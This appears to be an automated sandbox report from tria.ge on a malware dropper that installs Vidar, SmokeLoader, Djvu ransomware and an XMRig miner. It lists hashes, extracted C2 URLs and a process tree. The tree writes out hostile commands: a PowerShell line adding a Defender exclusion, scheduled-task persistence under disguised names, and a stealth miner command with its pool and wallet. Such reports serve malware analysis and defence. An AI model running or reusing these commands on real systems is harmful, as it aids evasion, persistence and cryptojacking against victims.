Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
07/09/2021, 17:26
210907-vzzaxsdae6 1007/09/2021, 13:18
210907-qkaa2acfe3 1006/09/2021, 17:52
210906-wfz9jsbch4 1006/09/2021, 17:51
210906-wfnwhsbch3 1006/09/2021, 13:27
210906-qp3hdaedaj 1006/09/2021, 09:28
210906-lfpgyaeael 1006/09/2021, 04:33
210906-e6mmpsaaa2 1005/09/2021, 05:25
210905-f4h26sfab6 1004/09/2021, 21:32
210904-1dqdsahfdj 1004/09/2021, 21:19
210904-z56z6shfck 10Analysis
-
max time kernel
16s -
max time network
466s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
06/09/2021, 17:51
Errors
Reason
Remote task has failed: Machine shutdown
General
-
Target
setup_x86_x64_install.exe
-
Size
2.2MB
-
MD5
e3b3a95ef03de0de77cca7a54ea22c94
-
SHA1
d318d234f8f27f25de660d9881113df9d11c24ff
-
SHA256
baa381f572d293636b6e48cacd2cd6a6f4f9e5f71c583873260f6ac01f0f5e15
-
SHA512
3c1c6254f14491bc2cb096d8b46d0d65e096dac331bab2df9c5b173271eef1b9a9deb831f212a0117fab16665277208d0c1b5183ea600cc2bbe6f9049c57ad0d
Score
10/10
Malware Config
Extracted
Family
vidar
Version
40.4
Botnet
706
C2
https://romkaxarit.tumblr.com/
Attributes
-
profile_id
706
Extracted
Family
smokeloader
Version
2020
C2
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
rc4.i32
rc4.i32
Signatures
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Vidar Stealer 1 IoCs
-
XMRig Miner Payload 2 IoCs
-
ASPack v2.12-2.42 6 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Downloads MZ/PE file
-
Executes dropped EXE 7 IoCs
-
Loads dropped DLL 28 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Themida packer 1 IoCs
Detects Themida, an advanced Windows software protection system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 6 IoCs
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Kills process with taskkill 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8B781615\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8B781615\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri156ec98815f89c.exe4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1544861ac3fe6a.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS8B781615\Fri1544861ac3fe6a.exeFri1544861ac3fe6a.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 936 -s 10366⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri157e25afd971.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS8B781615\Fri157e25afd971.exeFri157e25afd971.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-BCG39.tmp\Fri157e25afd971.tmp"C:\Users\Admin\AppData\Local\Temp\is-BCG39.tmp\Fri157e25afd971.tmp" /SL5="$4012C,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS8B781615\Fri157e25afd971.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-GOB50.tmp\zab2our.exe"C:\Users\Admin\AppData\Local\Temp\is-GOB50.tmp\zab2our.exe" /S /UID=burnerch27⤵
-
C:\Program Files\Windows Portable Devices\NOXFRSSDIN\ultramediaburner.exe"C:\Program Files\Windows Portable Devices\NOXFRSSDIN\ultramediaburner.exe" /VERYSILENT8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-ITBCN.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-ITBCN.tmp\ultramediaburner.tmp" /SL5="$40252,281924,62464,C:\Program Files\Windows Portable Devices\NOXFRSSDIN\ultramediaburner.exe" /VERYSILENT9⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\56-aae89-d38-a4fbc-a3214e3608537\Nagymaesona.exe"C:\Users\Admin\AppData\Local\Temp\56-aae89-d38-a4fbc-a3214e3608537\Nagymaesona.exe"8⤵
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2936 CREDAT:275457 /prefetch:210⤵
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2936 CREDAT:406543 /prefetch:210⤵
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2160 CREDAT:275457 /prefetch:210⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\17-09ef4-012-ed190-eaef4507b3f69\Vyzhybytexa.exe"C:\Users\Admin\AppData\Local\Temp\17-09ef4-012-ed190-eaef4507b3f69\Vyzhybytexa.exe"8⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri15af75ee9b.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8B781615\Fri15af75ee9b.exeFri15af75ee9b.exe5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri155442fc38b.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS8B781615\Fri155442fc38b.exeFri155442fc38b.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\5776050.exe"C:\Users\Admin\AppData\Roaming\5776050.exe"6⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 368 -s 12687⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Roaming\4082493.exe"C:\Users\Admin\AppData\Roaming\4082493.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
-
-
-
C:\Users\Admin\AppData\Roaming\5127298.exe"C:\Users\Admin\AppData\Roaming\5127298.exe"6⤵
-
-
C:\Users\Admin\AppData\Roaming\4983577.exe"C:\Users\Admin\AppData\Roaming\4983577.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 17607⤵
- Program crash
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1553f0ee90.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS8B781615\Fri1553f0ee90.exeFri1553f0ee90.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\2045531.exe"C:\Users\Admin\AppData\Roaming\2045531.exe"8⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2184 -s 17369⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Roaming\6764081.exe"C:\Users\Admin\AppData\Roaming\6764081.exe"8⤵
-
-
C:\Users\Admin\AppData\Roaming\8928184.exe"C:\Users\Admin\AppData\Roaming\8928184.exe"8⤵
-
-
C:\Users\Admin\AppData\Roaming\5744697.exe"C:\Users\Admin\AppData\Roaming\5744697.exe"8⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1628 -s 13928⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Pubdate.exe"C:\Users\Admin\AppData\Local\Temp\Pubdate.exe"7⤵
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\is-PL04D.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-PL04D.tmp\setup_2.tmp" /SL5="$1017C,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-9LQ1K.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-9LQ1K.tmp\setup_2.tmp" /SL5="$3017C,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c APPNAME7.exe4⤵
-
-
-
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Users\Admin\AppData\Local\Temp\C7A3.exeC:\Users\Admin\AppData\Local\Temp\C7A3.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\D1C.exeC:\Users\Admin\AppData\Local\Temp\D1C.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\5737.exeC:\Users\Admin\AppData\Local\Temp\5737.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\5737.exeC:\Users\Admin\AppData\Local\Temp\5737.exe2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\285e6808-3460-4c84-b60e-e8bd73ca2cb6" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
-
-
C:\Users\Admin\AppData\Local\Temp\5737.exe"C:\Users\Admin\AppData\Local\Temp\5737.exe" --Admin IsNotAutoStart IsNotTask3⤵
-
C:\Users\Admin\AppData\Local\Temp\5737.exe"C:\Users\Admin\AppData\Local\Temp\5737.exe" --Admin IsNotAutoStart IsNotTask4⤵
-
C:\Users\Admin\AppData\Local\29835459-6191-48e5-a3b9-69d635590285\build2.exe"C:\Users\Admin\AppData\Local\29835459-6191-48e5-a3b9-69d635590285\build2.exe"5⤵
-
C:\Users\Admin\AppData\Local\29835459-6191-48e5-a3b9-69d635590285\build2.exe"C:\Users\Admin\AppData\Local\29835459-6191-48e5-a3b9-69d635590285\build2.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3216 -s 4127⤵
- Program crash
-
-
-
-
C:\Users\Admin\AppData\Local\29835459-6191-48e5-a3b9-69d635590285\build3.exe"C:\Users\Admin\AppData\Local\29835459-6191-48e5-a3b9-69d635590285\build3.exe"5⤵
-
C:\Users\Admin\AppData\Local\29835459-6191-48e5-a3b9-69d635590285\build3.exe"C:\Users\Admin\AppData\Local\29835459-6191-48e5-a3b9-69d635590285\build3.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- Creates scheduled task(s)
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\B455.exeC:\Users\Admin\AppData\Local\Temp\B455.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\FD28.exeC:\Users\Admin\AppData\Local\Temp\FD28.exe1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
248KB
-
Filesize
572KB
-
Filesize
572KB
-
Filesize
1.5MB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
152KB
-
Filesize
1.5MB
-
Filesize
152KB
-
Filesize
436KB
-
Filesize
29.7MB
-
Filesize
29.7MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
192KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
88KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
84KB
-
Filesize
36KB
-
Filesize
29.3MB
-
Filesize
128KB
-
Filesize
7.4MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
29.4MB
-
Filesize
188KB
-
Filesize
92KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
48KB
-
Filesize
88KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
244KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
192KB
-
Filesize
29.4MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
80KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
80KB
-
Filesize
4KB